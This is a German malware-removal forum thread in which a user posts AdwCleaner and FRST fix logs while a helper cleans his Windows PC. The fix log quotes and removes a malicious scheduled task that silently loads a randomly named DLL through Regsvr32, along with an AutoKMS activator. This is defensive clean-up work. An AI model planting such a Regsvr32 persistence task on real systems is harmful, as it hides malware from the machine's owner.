  • Starte die FRST.exe erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
  • FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner nächsten Antwort.






Bitte poste mit deiner nächsten Antwort
  • die Logdatei des FRST-Fix,
  • die Logdatei von SystemLook,
  • die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt).
__________________
Gruß
M-K-D-B


==========================================================
offline vom 22.12.2018 bis 01.01.2019
==========================================================

Das Trojaner-Board unterstützen

Alt 23.05.2017, 18:34   #15
dinoexe
 
Trojaner, Adware oder sonstiges ? - Standard

Trojaner, Adware oder sonstiges ?



Guten Abend,

anbei die gewünschten Logs
Code:
ATTFilter
# AdwCleaner v6.046 - Bericht erstellt am 23/05/2017 um 18:18:23
# Aktualisiert am 24/04/2017 von Malwarebytes
# Datenbank : 2017-05-23.1 [Lokal]
# Betriebssystem : Windows 10 Pro  (X64)
# Benutzername : Dino - ****
# Gestartet von : C:\Users\Dino\Desktop\AdwCleaner_6.046.exe
# Modus: Löschen
# Unterstützung : https://www.malwarebytes.com/support



***** [ Dienste ] *****



***** [ Ordner ] *****



***** [ Dateien ] *****



***** [ DLL ] *****



***** [ WMI ] *****



***** [ Verknüpfungen ] *****



***** [ Aufgabenplanung ] *****



***** [ Registrierungsdatenbank ] *****



***** [ Browser ] *****



*************************

:: "Tracing" Schlüssel gelöscht
:: Winsock Einstellungen zurückgesetzt
:: "Image File Execution Options" Schlüssel gelöscht
:: "Prefetch" Dateien gelöscht
:: Proxy Einstellungen zurückgesetzt
:: Firewall Einstellungen zurückgesetzt
:: Internet Explorer Richtlinien gelöscht
:: Chrome Richtlinien gelöscht
!! Chrome Einstellungen nicht zurückgesetzt: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\Default
!! Chrome Einstellungen nicht zurückgesetzt: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [6849 Bytes] - [22/05/2017 18:19:38]
C:\AdwCleaner\AdwCleaner[C2].txt - [1640 Bytes] - [23/05/2017 18:13:04]
C:\AdwCleaner\AdwCleaner[C3].txt - [1420 Bytes] - [23/05/2017 18:18:23]
C:\AdwCleaner\AdwCleaner[S0].txt - [6473 Bytes] - [22/05/2017 18:18:35]
C:\AdwCleaner\AdwCleaner[S1].txt - [1479 Bytes] - [23/05/2017 18:12:22]
C:\AdwCleaner\AdwCleaner[S2].txt - [1624 Bytes] - [23/05/2017 18:16:09]
C:\AdwCleaner\AdwCleaner[S3].txt - [1697 Bytes] - [23/05/2017 18:18:04]

########## EOF - C:\AdwCleaner\AdwCleaner[C3].txt - [1785 Bytes] ##########
         
Code:
ATTFilter
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 22-05-2017
durchgeführt von Dino (23-05-2017 18:23:47) Run:1
Gestartet von C:\Users\Dino\Desktop
Geladene Profile: Dino (Verfügbare Profile: Dino)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************

CloseProcesses:
C:\USERS\DINO\APPDATA\ROAMING\PROFILES
CMD: type "C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\profiles.ini"
Task: {03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {04670283-EDCA-415F-9886-04F65EE28E14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {4E847E30-5E1C-4E48-8586-201A11017D85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
Task: {57EE3E64-10C3-4731-B511-79FE0C97A37A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} - \Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 -> Keine Datei <==== ACHTUNG
Task: {A839842C-D8D3-410F-A730-39BC24C4484E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {AF7B870D-2508-4548-AF95-6776A6BBB9E1} - System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\646f2bbc\1a8cacde.dll" <==== ACHTUNG
Task: {B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe 
C:\Windows\AutoKMS
Task: {C571DD8E-3ED6-476A-BAAE-A345728189FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {DE695851-C428-40A8-8661-95C82C81093C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
CMD: dir "%ProgramFiles%"
CMD: dir "%ProgramFiles(x86)%"
CMD: dir "%ProgramData%"
CMD: dir "%Appdata%"
CMD: dir "%LocalAppdata%"
CMD: dir "%CommonProgramFiles(x86)%"
CMD: dir "%CommonProgramW6432%"
CMD: dir "%UserProfile%"
RemoveProxy:
CMD: ipconfig /flushdns
CMD: netsh winsock reset
EmptyTemp:

*****************

Prozesse erfolgreich geschlossen.
C:\USERS\DINO\APPDATA\ROAMING\PROFILES => erfolgreich verschoben

========= type "C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\profiles.ini" =========

[General]
StartWithLastProfile=1

[Profile0]
Name=default-1489247668614
IsRelative=1
Path=Profiles/rcgkbgt3.default-1489247668614


========= Ende von CMD: =========

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{04670283-EDCA-415F-9886-04F65EE28E14} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04670283-EDCA-415F-9886-04F65EE28E14} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4E847E30-5E1C-4E48-8586-201A11017D85} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4E847E30-5E1C-4E48-8586-201A11017D85} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{57EE3E64-10C3-4731-B511-79FE0C97A37A} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{57EE3E64-10C3-4731-B511-79FE0C97A37A} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A839842C-D8D3-410F-A730-39BC24C4484E} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A839842C-D8D3-410F-A730-39BC24C4484E} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AF7B870D-2508-4548-AF95-6776A6BBB9E1} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF7B870D-2508-4548-AF95-6776A6BBB9E1} => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{522333AA-23D9-85D6-489B-224F78B46908} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\AutoKMS => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS => Schlüssel erfolgreich entfernt
C:\Windows\AutoKMS => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C571DD8E-3ED6-476A-BAAE-A345728189FD} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C571DD8E-3ED6-476A-BAAE-A345728189FD} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DE695851-C428-40A8-8661-95C82C81093C} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DE695851-C428-40A8-8661-95C82C81093C} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => Schlüssel erfolgreich entfernt

========= dir "%ProgramFiles%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: B0DD-0F8A

 Verzeichnis von C:\Program Files

22.05.2017  18:25    <DIR>          .
22.05.2017  18:25    <DIR>          ..
26.04.2015  13:26    <DIR>          Adblock Plus for IE
17.05.2017  21:18    <DIR>          AMD
07.05.2017  17:13    <DIR>          ASUS
05.02.2017  21:17    <DIR>          Bitdefender
23.05.2017  18:19    <DIR>          Bitdefender Agent
26.04.2015  15:41    <DIR>          Canon
22.05.2017  18:19    <DIR>          Common Files
07.05.2017  17:14    <DIR>          Intel
20.03.2017  06:41    <DIR>          Internet Explorer
22.05.2017  18:25    <DIR>          Malwarebytes
24.05.2015  12:10    <DIR>          Microsoft Xbox 360 Accessories
07.05.2017  18:09    <DIR>          MSBuild
07.05.2017  17:13    <DIR>          Realtek
07.05.2017  18:09    <DIR>          Reference Assemblies
24.05.2015  14:30    <DIR>          Rockstar Games
05.02.2017  21:06    <DIR>          Unlocker
03.05.2017  17:22    <DIR>          UNP
05.02.2017  20:54    <DIR>          VS Revo Group
20.03.2017  06:41    <DIR>          Windows Defender
20.03.2017  06:43    <DIR>          Windows Defender Advanced Threat Protection
07.05.2017  17:14    <DIR>          Windows Mail
20.03.2017  06:41    <DIR>          Windows Media Player
18.03.2017  23:03    <DIR>          Windows Multimedia Platform
07.05.2017  17:20    <DIR>          Windows NT
09.05.2017  23:04    <DIR>          Windows Photo Viewer
18.03.2017  23:03    <DIR>          Windows Portable Devices
18.03.2017  23:03    <DIR>          Windows Security
18.03.2017  23:03    <DIR>          WindowsPowerShell
24.05.2015  12:00    <DIR>          WinRAR
               0 Datei(en),              0 Bytes
              31 Verzeichnis(se), 158.767.104.000 Bytes frei

========= Ende von CMD: =========


========= dir "%ProgramFiles(x86)%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: B0DD-0F8A

 Verzeichnis von C:\Program Files (x86)

22.05.2017  18:28    <DIR>          .
22.05.2017  18:28    <DIR>          ..
30.09.2016  17:46    <DIR>          AMD
25.04.2015  07:04    <DIR>          AMD AVT
07.05.2017  17:14    <DIR>          ASUS
26.12.2015  16:08    <DIR>          Battle.net
26.04.2015  15:42    <DIR>          Canon
07.05.2017  17:14    <DIR>          Common Files
25.04.2015  07:59    <DIR>          CrystalDiskInfo
22.01.2017  16:12    <DIR>          Drakonia Configurator
15.08.2015  16:49    <DIR>          Ghostery
05.02.2017  20:50    <DIR>          Google
25.04.2015  07:20    <DIR>          Intel
20.03.2017  06:41    <DIR>          Internet Explorer
29.01.2017  17:53    <DIR>          Lavalys
05.02.2017  17:59    <DIR>          linker
25.02.2017  13:10    <DIR>          McAfee
19.05.2017  14:20    <DIR>          Microsoft.NET
08.05.2017  21:19    <DIR>          MonitorDriver
22.05.2017  18:14    <DIR>          Mozilla Firefox
22.05.2017  18:20    <DIR>          Mozilla Maintenance Service
07.05.2017  18:09    <DIR>          MSBuild
22.08.2015  16:59    <DIR>          Origin
22.08.2015  16:57    <DIR>          Origin Games
30.11.2016  18:54    <DIR>          PDF24
05.02.2017  18:36    <DIR>          Qeqotion
05.02.2017  17:58    <DIR>          Raptr
16.08.2015  13:40    <DIR>          Realtek
07.05.2017  18:09    <DIR>          Reference Assemblies
24.05.2015  14:30    <DIR>          Rockstar Games
24.02.2016  19:36    <DIR>          Samsung
26.04.2015  14:27    <DIR>          Skype
21.05.2017  20:55    <DIR>          Spybot - Search & Destroy 2
21.05.2017  21:36    <DIR>          Steam
26.04.2015  14:25    <DIR>          TeamSpeak 3 Client
26.04.2015  13:39    <DIR>          Ubisoft
24.05.2015  14:30    <DIR>          VS Revo Group
01.05.2017  12:44    <DIR>          VulkanRT
20.03.2017  06:41    <DIR>          Windows Defender
07.05.2017  17:14    <DIR>          Windows Mail
20.03.2017  06:41    <DIR>          Windows Media Player
18.03.2017  23:03    <DIR>          Windows Multimedia Platform
18.03.2017  23:03    <DIR>          Windows NT
09.05.2017  23:04    <DIR>          Windows Photo Viewer
18.03.2017  23:03    <DIR>          Windows Portable Devices
18.03.2017  23:03    <DIR>          WindowsPowerShell
19.02.2017  12:30    <DIR>          WISO
               0 Datei(en),              0 Bytes
              47 Verzeichnis(se), 158.766.522.368 Bytes frei

========= Ende von CMD: =========


========= dir "%ProgramData%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: B0DD-0F8A

 Verzeichnis von C:\ProgramData

26.04.2015  15:01    <DIR>          .mono
05.02.2017  19:40            46.145 agent.1486316443.bdinstall.bin
05.02.2017  20:08            26.583 agent.1486318128.bdinstall.bin
05.02.2017  20:09            26.510 agent.1486318150.bdinstall.bin
05.02.2017  20:52            46.366 agent.1486320772.bdinstall.bin
05.02.2017  20:55            28.837 agent.1486320909.bdinstall.bin
05.02.2017  20:57            46.212 agent.1486321078.bdinstall.bin
05.02.2017  21:01            26.790 agent.1486321314.bdinstall.bin
05.02.2017  21:02            28.833 agent.1486321377.bdinstall.bin
05.02.2017  21:11            46.370 agent.1486321901.bdinstall.bin
09.02.2017  19:09            28.754 agent.1486660167.bdinstall.bin
08.03.2017  21:56            29.970 agent.update.1489002971.bdinstall.bin
01.05.2017  12:45    <DIR>          AMD
25.04.2015  07:21    <DIR>          ASUS
05.01.2016  19:09    <DIR>          ATI
05.02.2017  17:58    <DIR>          Avg
26.04.2015  13:35    <DIR>          Battle.net
05.02.2017  19:52    <DIR>          BDLogging
05.02.2017  20:28    <DIR>          Bitdefender
05.02.2017  21:11    <DIR>          Bitdefender Agent
05.02.2017  21:17    <DIR>          Bitdefender Device Management
26.04.2015  13:38    <DIR>          Blizzard Entertainment
12.02.2017  16:02    <DIR>          Buhl Data Service GmbH
26.04.2015  15:42    <DIR>          Canon IJ Network Tool
26.04.2015  15:41    <DIR>          CanonIJWSpt
05.02.2017  21:15           381.546 cl.1486322005.bdinstall.bin
16.07.2016  13:47    <DIR>          Comms
03.10.2016  18:50    <DIR>          dbdata
05.02.2017  21:17            55.877 dm.1486322271.bdinstall.bin
07.02.2017  23:33            35.238 dm.1486503192.bdinstall.bin
22.08.2015  17:13    <DIR>          Electronic Arts
29.03.2017  15:57    <DIR>          elsterformular
25.04.2015  07:16    <DIR>          Intel
22.05.2017  18:25    <DIR>          Malwarebytes
09.02.2017  23:13    <DIR>          McAfee
19.05.2017  14:20    <DIR>          Microsoft Help
07.05.2017  21:26    <DIR>          Microsoft OneDrive
25.04.2015  06:53    <DIR>          Microsoft Toolkit
23.08.2015  17:45    <DIR>          Origin
01.05.2017  12:17    <DIR>          Package Cache
05.02.2017  21:11    <DIR>          Panda Security
19.05.2017  14:20    <DIR>          regid.1991-06.com.microsoft
24.02.2016  19:36    <DIR>          Samsung
26.04.2015  14:27    <DIR>          Skype
24.05.2015  13:01    <DIR>          Socialclub
18.03.2017  23:03    <DIR>          SoftwareDistribution
25.07.2015  12:29    <DIR>          Solidshield
21.05.2017  20:54    <DIR>          Spybot - Search & Destroy
24.05.2015  13:01    <DIR>          Steam
07.05.2017  17:17    <DIR>          USOPrivate
07.05.2017  17:17    <DIR>          USOShared
20.03.2017  06:43    <DIR>          WindowsHolographicDevices
01.03.2017  19:50    <DIR>          {CA67D69C-7DCC-6137-7CD8-F928B38095A6}
              14 Datei(en),        854.031 Bytes
              39 Verzeichnis(se), 158.766.460.928 Bytes frei

========= Ende von CMD: =========


========= dir "%Appdata%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: B0DD-0F8A

 Verzeichnis von C:\Users\Dino\AppData\Roaming

23.05.2017  18:23    <DIR>          .
23.05.2017  18:23    <DIR>          ..
26.04.2015  15:01    <DIR>          .mono
25.04.2015  06:35    <DIR>          Adobe
26.04.2015  13:35    <DIR>          AMD
25.04.2015  06:55    <DIR>          ATI
26.04.2015  13:36    <DIR>          Battle.net
05.02.2017  20:03    <DIR>          Bitdefender
13.02.2016  12:34    <DIR>          Buhl Data Service
02.11.2015  19:52    <DIR>          Canon
22.01.2017  16:23    <DIR>          discord
24.02.2017  12:45    <DIR>          EasyAntiCheat
21.02.2016  17:08    <DIR>          elsterformular
25.04.2015  07:16    <DIR>          InstallShield
25.07.2015  10:49    <DIR>          library_dir
25.04.2015  06:47    <DIR>          Macromedia
22.01.2017  16:12    <DIR>          MingGuan
15.08.2015  16:53    <DIR>          Mozilla
22.08.2015  16:16    <DIR>          Origin
05.02.2017  19:51    <DIR>          QuickScan
29.12.2015  18:13    <DIR>          Raptr
31.08.2015  18:08    <DIR>          Samsung
02.09.2016  18:13    <DIR>          Skype
19.02.2017  12:51    <DIR>          Spotify
26.04.2015  15:01    <DIR>          Steam
29.03.2017  15:50    <DIR>          TeamViewer
26.04.2015  14:52    <DIR>          TS3Client
25.07.2015  13:25    <DIR>          Ubisoft
24.05.2015  12:00    <DIR>          WinRAR
               0 Datei(en),              0 Bytes
              29 Verzeichnis(se), 158.766.403.584 Bytes frei

========= Ende von CMD: =========


========= dir "%LocalAppdata%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: B0DD-0F8A

 Verzeichnis von C:\Users\Dino\AppData\Local

23.05.2017  17:47    <DIR>          .
23.05.2017  17:47    <DIR>          ..
18.01.2016  18:14    <DIR>          ActiveSync
19.02.2017  12:20    <DIR>          Adobe
07.11.2016  18:25    <DIR>          AMD
25.04.2015  06:55    <DIR>          ATI
26.12.2015  16:18    <DIR>          Battle.net
26.04.2015  13:35    <DIR>          Blizzard Entertainment
12.02.2017  16:01    <DIR>          Buhl
13.02.2016  12:34    <DIR>          Buhl Data Service
17.09.2015  11:20    <DIR>          CEF
26.04.2015  15:01    <DIR>          Colossal Order
16.08.2015  13:53    <DIR>          Comms
03.10.2016  12:54    <DIR>          ConnectedDevicesPlatform
07.05.2017  21:24    <DIR>          DBG
22.01.2017  15:26    <DIR>          Discord
28.01.2017  16:51    <DIR>          ElevatedDiagnostics
15.08.2015  16:49    <DIR>          GhosteryConfig
22.11.2015  12:23    <DIR>          Google
11.07.2015  10:40    <DIR>          GWX
22.04.2017  19:40    <DIR>          JDownloader v2.0
18.09.2015  12:19    <DIR>          Macromedia
07.05.2017  17:17    <DIR>          Microsoft
25.04.2015  17:25    <DIR>          Microsoft Help
21.08.2015  17:13    <DIR>          MicrosoftEdge
16.08.2015  01:05    <DIR>          Mozilla
22.08.2015  14:38    <DIR>          Origin
09.05.2017  21:32    <DIR>          Packages
02.11.2015  19:58    <DIR>          PDF24
22.08.2015  13:46    <DIR>          PeerDistRepub
22.05.2017  18:28    <DIR>          Programs
16.08.2015  13:45    <DIR>          Publishers
27.01.2017  23:52             7.601 Resmon.ResmonCfg
24.05.2015  12:51    <DIR>          Rockstar Games
26.04.2015  14:27    <DIR>          Skype
19.02.2017  13:23    <DIR>          Spotify
22.01.2017  15:26    <DIR>          SquirrelTemp
16.08.2015  13:49    <DIR>          Stardock
01.05.2017  10:53    <DIR>          Steam
23.05.2017  18:22    <DIR>          Temp
16.08.2015  13:45    <DIR>          TileDataLayer
24.02.2017  12:54    <DIR>          Ubisoft Game Launcher
03.05.2017  17:47    <DIR>          UNP
25.04.2015  06:35    <DIR>          VirtualStore
               1 Datei(en),          7.601 Bytes
              43 Verzeichnis(se), 158.766.346.240 Bytes frei

========= Ende von CMD: =========


========= dir "%CommonProgramFiles(x86)%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: B0DD-0F8A

 Verzeichnis von C:\Program Files (x86)\Common Files

07.05.2017  17:14    <DIR>          .
07.05.2017  17:14    <DIR>          ..
25.04.2015  07:04    <DIR>          ATI Technologies
26.04.2015  13:38    <DIR>          Blizzard Entertainment
25.04.2015  07:20    <DIR>          InstallShield
19.05.2017  14:20    <DIR>          Microsoft Shared
25.04.2015  07:16    <DIR>          postureAgent
18.03.2017  23:03    <DIR>          Services
05.02.2017  20:51    <DIR>          Skype
01.05.2017  12:40    <DIR>          Steam
20.03.2017  06:41    <DIR>          System
               0 Datei(en),              0 Bytes
              11 Verzeichnis(se), 158.766.292.992 Bytes frei

========= Ende von CMD: =========


========= dir "%CommonProgramW6432%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: B0DD-0F8A

 Verzeichnis von C:\Program Files\Common Files

22.05.2017  18:19    <DIR>          .
22.05.2017  18:19    <DIR>          ..
07.05.2017  17:13    <DIR>          ATI Technologies
05.02.2017  19:52    <DIR>          Bitdefender
09.02.2017  19:08    <DIR>          Intel
19.05.2017  14:20    <DIR>          microsoft shared
18.03.2017  23:03    <DIR>          Services
19.05.2017  14:20    <DIR>          System
               0 Datei(en),              0 Bytes
               8 Verzeichnis(se), 158.766.235.648 Bytes frei

========= Ende von CMD: =========


========= dir "%UserProfile%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: B0DD-0F8A

 Verzeichnis von C:\Users\Dino

14.05.2017  22:59    <DIR>          .
14.05.2017  22:59    <DIR>          ..
10.05.2017  21:47    <DIR>          Contacts
23.05.2017  18:23    <DIR>          Desktop
07.05.2017  21:24    <DIR>          Documents
07.05.2017  21:24    <DIR>          Downloads
10.05.2017  21:47    <DIR>          Favorites
10.05.2017  21:47    <DIR>          Links
07.05.2017  21:24    <DIR>          Music
23.05.2017  18:23    <DIR>          OneDrive
07.05.2017  21:24    <DIR>          Pictures
10.05.2017  21:47    <DIR>          Saved Games
10.05.2017  21:47    <DIR>          Searches
26.04.2015  14:32    <DIR>          Tracing
07.05.2017  21:24    <DIR>          Videos
               0 Datei(en),              0 Bytes
              15 Verzeichnis(se), 158.766.174.208 Bytes frei

========= Ende von CMD: =========


========= RemoveProxy: =========

HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => Wert erfolgreich entfernt
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => Wert erfolgreich entfernt


========= Ende von RemoveProxy: =========


========= ipconfig /flushdns =========


Windows-IP-Konfiguration

Der DNS-Aufl”sungscache wurde geleert.

========= Ende von CMD: =========


========= netsh winsock reset =========


Der Winsock-Katalog wurde zurckgesetzt.
Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen.


========= Ende von CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 6578176 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 23722052 B
Java, Flash, Steam htmlcache => 9458 B
Windows/system/drivers => 13712566 B
Edge => 7492150 B
Chrome => 325000 B
Firefox => 17232432 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 22794 B
NetworkService => 125238 B
Dino => 44261836 B

RecycleBin => 277578 B
EmptyTemp: => 108.5 MB temporäre Dateien entfernt.

================================


Das System musste neu gestartet werden.

==== Ende von Fixlog 18:24:09 ====
         
Code:
ATTFilter
